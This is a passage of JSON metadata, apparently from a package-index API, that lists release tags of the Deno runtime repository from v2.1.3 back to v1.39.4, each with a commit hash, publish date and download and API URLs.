b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codel